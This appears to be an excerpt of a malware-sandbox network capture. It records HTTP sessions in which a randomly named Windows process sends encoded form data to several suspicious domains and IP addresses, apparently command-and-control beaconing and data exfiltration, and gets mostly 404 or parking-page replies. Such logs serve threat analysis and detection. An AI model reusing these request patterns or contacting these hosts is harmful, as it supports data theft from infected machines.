Nov 26, 2024 11:17:19.394519091 CET | 369 | OUT | GET /7yx4/?4nJt=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQfxXg8RiZPfSfo9OGQETOHlofaWbM+4fubyGFlkwZbqaQYg0Zq5k=&pXIDi=30N834GpBZU0OT HTTP/1.1
                                                                                                                      Host: www.rtpterbaruwaktu3.xyz
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 26, 2024 11:17:21.031378984 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Connection: close
                                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                      pragma: no-cache
                                                                                                                      content-type: text/html
                                                                                                                      content-length: 796
                                                                                                                      date: Tue, 26 Nov 2024 10:17:20 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49845 | 38.47.232.124 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:17:36.905915022 CET | 600 | OUT | POST /klhq/ HTTP/1.1
                                                                                                                      Host: www.70kdd.top
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.70kdd.top
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 209
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.70kdd.top/klhq/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Ascii: 4nJt=NFwfoXbecwawWZ0LriD9vflvEM6k1NDUc0jSQCQ1fdUVdmvM0p9F/44uED3wale0zTr9mz/mhAWpcs1uGPRmid3QkXxhlp4h04wU9KXK0Bae29sSAQbDDWAh81hf9ehV9o6s8FBAbsZizQ0KhdB81nteFmr9Bcw2c7EBwaPZb7M0gbGondi2qgJ8dAHhw0fgI0PY/IfFvZNU
Nov 26, 2024 11:17:38.476531029 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:17:38 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 148
                                                                                                                      Connection: close
                                                                                                                      ETag: "66e01838-94"
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49852 | 38.47.232.124 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:17:39.575300932 CET | 624 | OUT | POST /klhq/ HTTP/1.1
                                                                                                                      Host: www.70kdd.top
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.70kdd.top
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 233
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.70kdd.top/klhq/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Ascii: 4nJt=NFwfoXbecwawX5kLpBr9/PloY86k+tDQc0/SQBduD+wVTk3M1o9F644uKj31F1eFzTnbmzDmhB2pcoxuG8IUiN3er3xj7Z4h04wU9KDg0BCe2t8SA0PcJ2Am1Vhf5ege9o6a8AZ6bpFizU4KiMB7+ntQIGqXGvJtR51y2p70Yp8SsNby7uiV4wp+dCfTwUfKK03YtfTigto3lB5vCHL1Y3VXs4qaWbKOsg==
Nov 26, 2024 11:17:41.243105888 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:17:40 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 148
                                                                                                                      Connection: close
                                                                                                                      ETag: "66e01838-94"
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49858 | 38.47.232.124 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:17:42.246438980 CET | 1637 | OUT | POST /klhq/ HTTP/1.1
                                                                                                                      Host: www.70kdd.top
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.70kdd.top
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 1245
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.70kdd.top/klhq/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 26, 2024 11:17:43.760225058 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:17:43 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 148
                                                                                                                      Connection: close
                                                                                                                      ETag: "66e01838-94"
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49865 | 38.47.232.124 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:17:44.913440943 CET | 358 | OUT | GET /klhq/?4nJt=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+neDAiWkCkYZ57L047aTN0FvloZtiL1GHORQkvVBkncoqs6arxlw=&pXIDi=30N834GpBZU0OT HTTP/1.1
                                                                                                                      Host: www.70kdd.top
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 26, 2024 11:17:46.448482037 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Tue, 26 Nov 2024 10:17:46 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 148
                                                                                                                      Connection: close
                                                                                                                      ETag: "66e01838-94"
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49881 | 199.59.243.227 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:17:52.384960890 CET | 627 | OUT | POST /w9z4/ HTTP/1.1
                                                                                                                      Host: www.acond-22-mvr.click
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.acond-22-mvr.click
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 209
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Ascii: 4nJt=3+GoTPvyTIkI2U/obTYErMa2uxOnq+CMUVdCM+ZmNvdD+1DtTEVdb/rFAyU2U8b03F+JRwpGITB88SFFB4MbR8mlMQaSDOZQPRNwYTeJBz96s1v9aggeWu4K1ZfQl74ETE5q6rT6hsDS0ly+rJzya9ACMP6JhniGU1ROe9zcwXESeiOezScniMi3sz5YImG9dC4hqiW4XoF8
Nov 26, 2024 11:17:53.559665918 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                      date: Tue, 26 Nov 2024 10:17:52 GMT
                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                      content-length: 1138
                                                                                                                      x-request-id: 588feb69-6a16-4fb6-a42a-1222364900bc
                                                                                                                      cache-control: no-store, max-age=0
                                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                                                      set-cookie: parking_session=588feb69-6a16-4fb6-a42a-1222364900bc; expires=Tue, 26 Nov 2024 10:32:53 GMT; path=/
                                                                                                                      connection: close
                                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 26, 2024 11:17:53.559916019 CET | 591 | IN
                                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTg4ZmViNjktNmExNi00ZmI2LWE0MmEtMTIyMjM2NDkwMGJjIiwicGFnZV90aW1lIjoxNzMyNjE2Mj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49892 | 199.59.243.227 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:17:55.052819967 CET | 651 | OUT | POST /w9z4/ HTTP/1.1
                                                                                                                      Host: www.acond-22-mvr.click
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.acond-22-mvr.click
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 233
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                      Data Ascii: 4nJt=3+GoTPvyTIkI2xvoZ0EEssaxhROnwOCyUVBCM6o7N95DnRHtQFVde/rFLSUzLsbJ3Fj8RytGITV88T1FALUaeMmnKQacMuZQPRNwYTLiBwN6vFf9aFAfI+4N/5fQh74ATE5I6pnUhuLS0li+sYztT9AICv79wCf4RGILBuTHo2A3fUTEvhcEwcC1sxhqIGGXfCAh41afYcgfrGOJaOxbRB8pNYTsJVHfNg==
Nov 26, 2024 11:17:56.180934906 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                      date: Tue, 26 Nov 2024 10:17:55 GMT
                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                      content-length: 1138
                                                                                                                      x-request-id: b3a2f688-e0f2-4667-9295-0f188f27588c
                                                                                                                      cache-control: no-store, max-age=0
                                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                                                      set-cookie: parking_session=b3a2f688-e0f2-4667-9295-0f188f27588c; expires=Tue, 26 Nov 2024 10:32:56 GMT; path=/
                                                                                                                      connection: close
                                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 26, 2024 11:17:56.181469917 CET | 591 | IN
                                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjNhMmY2ODgtZTBmMi00NjY3LTkyOTUtMGYxODhmMjc1ODhjIiwicGFnZV90aW1lIjoxNzMyNjE2Mj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49899 | 199.59.243.227 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:17:57.708513021 CET | 1664 | OUT | POST /w9z4/ HTTP/1.1
                                                                                                                      Host: www.acond-22-mvr.click
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.acond-22-mvr.click
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 1245
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 26, 2024 11:17:58.790606022 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                      date: Tue, 26 Nov 2024 10:17:58 GMT
                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                      content-length: 1138
                                                                                                                      x-request-id: db95a5a4-ea5e-4f9c-a69c-8c523bedd0cb
                                                                                                                      cache-control: no-store, max-age=0
                                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                                                      set-cookie: parking_session=db95a5a4-ea5e-4f9c-a69c-8c523bedd0cb; expires=Tue, 26 Nov 2024 10:32:58 GMT; path=/
                                                                                                                      connection: close
                                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 26, 2024 11:17:58.790813923 CET | 591 | IN
                                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGI5NWE1YTQtZWE1ZS00ZjljLWE2OWMtOGM1MjNiZWRkMGNiIiwicGFnZV90aW1lIjoxNzMyNjE2Mj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49905 | 199.59.243.227 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:18:00.359397888 CET | 367 | OUT | GET /w9z4/?pXIDi=30N834GpBZU0OT&4nJt=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfeeeHGBayQssFEBpobh2/IGMpij3nRh8aV/8PsprR6rwOHUxE7sI= HTTP/1.1
                                                                                                                      Host: www.acond-22-mvr.click
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 26, 2024 11:18:01.496762037 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                      date: Tue, 26 Nov 2024 10:18:00 GMT
                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                      content-length: 1530
                                                                                                                      x-request-id: 2aa9dfd4-785a-4032-8608-51c1ec815ba2
                                                                                                                      cache-control: no-store, max-age=0
                                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RvW062cXIMZhiSLQwlOaX02MZFO2+ChFkzTqNtO8/oo0eOyoD2FNHlgDH0j9wdRoAql1DjyNqGTpEsHWuHmmjA==
                                                                                                                      set-cookie: parking_session=2aa9dfd4-785a-4032-8608-51c1ec815ba2; expires=Tue, 26 Nov 2024 10:33:01 GMT; path=/
                                                                                                                      connection: close
                                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RvW062cXIMZhiSLQwlOaX02MZFO2+ChFkzTqNtO8/oo0eOyoD2FNHlgDH0j9wdRoAql1DjyNqGTpEsHWuHmmjA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 26, 2024 11:18:01.497198105 CET | 983 | IN
                                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmFhOWRmZDQtNzg1YS00MDMyLTg2MDgtNTFjMWVjODE1YmEyIiwicGFnZV90aW1lIjoxNzMyNjE2Mj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49922 | 146.88.233.115 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:18:07.863389015 CET | 624 | OUT | POST /11t3/ HTTP/1.1
                                                                                                                      Host: www.smartcongress.net
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.smartcongress.net
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 209
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.smartcongress.net/11t3/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49929 | 146.88.233.115 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:18:10.523684025 CET | 648 | OUT | POST /11t3/ HTTP/1.1
                                                                                                                      Host: www.smartcongress.net
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.smartcongress.net
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 233
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.smartcongress.net/11t3/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 26, 2024 11:18:11.782625914 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                                                                      content-type: text/html; charset=iso-8859-1
                                                                                                                      content-length: 196
                                                                                                                      date: Tue, 26 Nov 2024 10:18:11 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      x-tuned-by: N0C
                                                                                                                      connection: close
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49938 | 146.88.233.115 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:18:13.192737103 CET | 1661 | OUT | POST /11t3/ HTTP/1.1
                                                                                                                      Host: www.smartcongress.net
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.smartcongress.net
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 1245
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.smartcongress.net/11t3/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 26, 2024 11:18:14.641567945 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                                                                      content-type: text/html; charset=iso-8859-1
                                                                                                                      content-length: 196
                                                                                                                      date: Tue, 26 Nov 2024 10:18:14 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      x-tuned-by: N0C
                                                                                                                      connection: close
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49944 | 146.88.233.115 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:18:15.846681118 CET | 366 | OUT | GET /11t3/?4nJt=BoXQYlgPFtFW2+QaEcN/9vg3Pg7HxeD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL01304IHNwj2Yod4wHZbXR5gNDbNQ3/FaK5QMq4IALVNsxgTOJYQtE8=&pXIDi=30N834GpBZU0OT HTTP/1.1
                                                                                                                      Host: www.smartcongress.net
                                                                                                                      Accept: */*
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Nov 26, 2024 11:18:17.113609076 CET | 380 | IN | HTTP/1.1 404 Not Found
                                                                                                                      content-type: text/html; charset=iso-8859-1
                                                                                                                      content-length: 196
                                                                                                                      date: Tue, 26 Nov 2024 10:18:16 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      x-tuned-by: N0C
                                                                                                                      connection: close
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49960 | 194.85.61.76 | 80 | 2444 | C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 11:18:23.164010048 CET | 621 | OUT | POST /2pji/ HTTP/1.1
                                                                                                                      Host: www.mrpokrovskii.pro
                                                                                                                      Accept: */*
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Origin: http://www.mrpokrovskii.pro
                                                                                                                      Cache-Control: max-age=0
                                                                                                                      Content-Length: 209
                                                                                                                      Connection: close
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Referer: http://www.mrpokrovskii.pro/2pji/
                                                                                                                      User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
